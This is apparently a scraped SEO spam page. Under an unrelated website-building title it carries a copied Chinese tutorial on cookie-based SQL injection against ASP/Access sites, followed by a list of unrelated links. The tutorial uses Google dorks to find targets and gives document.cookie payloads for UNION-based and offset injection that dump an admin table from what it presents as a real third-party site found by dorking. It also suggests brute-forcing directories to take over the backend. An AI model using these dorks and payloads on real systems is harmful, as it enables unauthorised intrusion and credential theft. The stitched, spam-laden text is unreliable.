当前位置: 首页 > news >正文

桂林模板网站建设wordpress v4.1模板

桂林模板网站建设,wordpress v4.1模板,服务器上的网站不能访问,有哪些平台免费做推广目录 谷歌语法-信息收集 cookie注入 实战演示 信息收集 SQL注入判断 查找字段数 爆破表名 输出结果 总结 hack渗透视频教程#xff0c;扫码免费领 谷歌语法-信息收集 1.查找带有ID传参的网站#xff08;可以查找sql注入漏洞#xff09; inurl:asp idxx 2.查找网站后… 目录 谷歌语法-信息收集 cookie注入 实战演示 信息收集 SQL注入判断 查找字段数 爆破表名 输出结果 总结 hack渗透视频教程扫码免费领 谷歌语法-信息收集 1.查找带有ID传参的网站可以查找sql注入漏洞 inurl:asp idxx 2.查找网站后台多数有登陆框可以查找弱口令暴力破解等漏洞 site:http://xxxx.com “admin” site:http://xx.com intext:管理 site:http://xx.com inurl:login site:http://xx.com intitle:后台 3.查看上传漏洞 site:http://xx.com inurl:file site:http://xx.com inurl:load 4.查找敏感文件 filetype:mdb|doc|xlsx|pdf cookie注入 1、cookie注入 cookie相当于访问者的身份证,后端php代码中的$_REQUEST[]来获取你的cookie,网站会获取Cookie传参然后和原有的SQL语句拼接再传入数据库,传入了数据库这样我们就有机可乘了我们可以修改cookie值进入数据库中进行sql注入 Cookie注入在ASP网站中和低版本php中才会有ASP常用的数据库是Accsess。 2、Access数据库 access有强大的数据处理、统计分析能力利用access的查询功能可以方便地进行各类汇总、平均等统计并且access数据库无库名。 access数据库在查询语句时和mysql不同access比较严谨 所以要select 字段 from 表名 函数exists(select*from 表名)可以验证这个表名是否存在这个表名还可以用burp来爆破 3、怎样修改cookie: 用burp抓包改 用插件改需要自己编码一下 阅览器自带js进行设置document.cookie’id’escape(“代码”) 实战演示 信息收集 通过谷歌语法查找带有asp文件下的id传参发现有很多带有id1传参的网站可以挨个试一试id传参数可以任意修改。 发现一家id104的网站 SQL注入判断 废话不多说直接判断是否存在sql注入,and 12发现网站报错但是11页面显示正常说明存在sql注入 document.cookieidescape(104 and 11)document.cookieidescape(104 and 12) 查找字段数 直接查找一下字段数发现字段数为10 document.cookieidescape(104 order by 10) 爆破表名 因为这是一个ACCESS数据库没有库名所以我们可以使用burp爆破出表名,这里就不给大家展示了。 document.cookieidescape(104 union select 1,2,3,4,5,6,7,8,9,10 from admin) 发现存在admin表且回显点是2和5 输出结果 使用偏移注入查看admin表的字段数并且把表里的内容显示出来 document.cookieidescape(104 union select 1,2,3,4,5,6,7,admin.* from admin)document.cookieidescape(104 union select 1,2,3,admin.*,7,8,9,10 from admin) 总结 1.谷歌语法找到注入点 2.判断注入是否存在 3.通过cookie绕过注入 4.爆破表名 5.偏移注入查找表的字段数 6.最后可以通过爆破目录查找登陆框进入后台进一步渗透拿权限这次实战记录很适合新手小白挖SRC希望多多支持~ hack渗透视频教程扫码免费领
http://www.hkea.cn/news/14451771/

相关文章:

  • 织梦模板大气网站建设类网站模板下载网址导航已取消是什么意思
  • 网站建设吉金手指排名13软件开发平台是什么意思
  • 网站策划设计网页免费模板大全
  • 福永响应式网站建设中英文双语网站站点
  • 网站建设用户核心c .net网站开发视频教程
  • 韩国在中国做美食的视频网站建站公司上海
  • 郑州网站建设zzjisu四川省网站建设
  • 内蒙古自治区工程建设网站兴宁网站设计
  • 做电影网站需要的服务器配置php 同学录在线网站开发
  • 泰兴做网站的公司wordpress4.8优化
  • 合肥市建设局网站微信小程序与公众号的区别
  • wordpress回收站建设免费网站模板
  • 做网站用了别人公司的图片可以吗软件拉新推广平台
  • 林河西网站建设网页设计与制作教程的出版社
  • 网站多语言 设计西安seo服务外包
  • 做电商网站哪里好wordpress连接失效
  • 做汽车行业必须注册际零件网站seo百度点击软件
  • 网站开发 培训 周末班高稳定性的网站设计制作
  • 宁波网站备案幕布拍照济南手机网站制作
  • 宁波网站建设官门户手机网站开发
  • 有域名如何做网站营销型网站的付费推广渠道
  • 长沙网站托管哪家好提升seo排名
  • 响应式网站用什么做企业网站实名审核中心
  • 环保网站模板下载企业网站建设 哪个公司做得好
  • 苏州那家公司做网站比较好wordpress随机文章
  • 重庆沙坪坝做网站百度搜索风云榜电视剧
  • 建公司网站美团服务商平台
  • 网站建设信息模板html成品网页模板下载
  • 小游戏网站建设麻涌网站建设公司
  • 如何做网站的伪静态页面做flash网站的软件